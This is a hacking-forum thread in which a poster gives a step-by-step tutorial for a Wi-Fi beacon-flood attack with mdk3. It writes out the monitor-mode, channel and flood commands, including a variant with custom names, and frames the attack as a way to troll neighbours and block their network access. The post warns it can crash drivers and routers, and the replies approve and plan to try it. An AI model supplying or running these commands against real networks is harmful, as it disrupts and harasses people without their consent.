EvilZone

Hacking and Security => Tutorials => Topic started by: queryFrequency on August 18, 2015, 01:13:30 PM

Title: Spam False AP's in the Area using MDK3
Post by: queryFrequency on August 18, 2015, 01:13:30 PM
Note: If you run this long enough, you can crash yours and neighbors drivers and mess their routers up.

> Explanation of Attack:
This will flood your neighbors list of networks with random access points names, or you can write up custom names like: "F YOU" or "I LOVE PONIES", etc. This is commonly used for trolling and attempting to block access for your neighbors to access their network.

> Lab and Requirements:
Basic knowledge of networking.
Exposure to the linux environment.
A network adapter that supports packet injection and monitor mode (master mode not needed).
A linux distribution with basic pentesting tools.

Firstly, let's start monitor mode by typing:
Code: [Select]
airmon-ng start <wireless interface>

Now, let's set the channel to 3 (it can be anything below 13):
Code: [Select]
iwconfig <monitor mode> channel <number>

Now let's begin the attack:
Code: [Select]

mdk3 <monitor mode> b -c <set channel> -m

Picture of attack:
(http://s3.postimg.org/olb2hxaqb/Untitled.png)

Picture of how the AP's are being spammed (It spams on MACs, iPads, Androids, etc. Everything with a list of AP's are vulnerable):
(http://s13.postimg.org/6bi3usynr/Untitled.png)

Now, you want to spam the list with custom written names? Simply write up a list with the names and type in this:
Code: [Select]
mdk3 <monitor mode> b -c <set channel> -m -f <directory with the list>
Title: Re: Spam False AP's in the Area using MDK3
Post by: P!X3LTR0N on August 18, 2015, 06:49:37 PM
Nice share.


This would be a great exercise for shits and giggles...
Title: Re: Spam False AP's in the Area using MDK3
Post by: Blackoutt on August 18, 2015, 08:25:38 PM
Good idea!

I will definitely try that :D

Thanks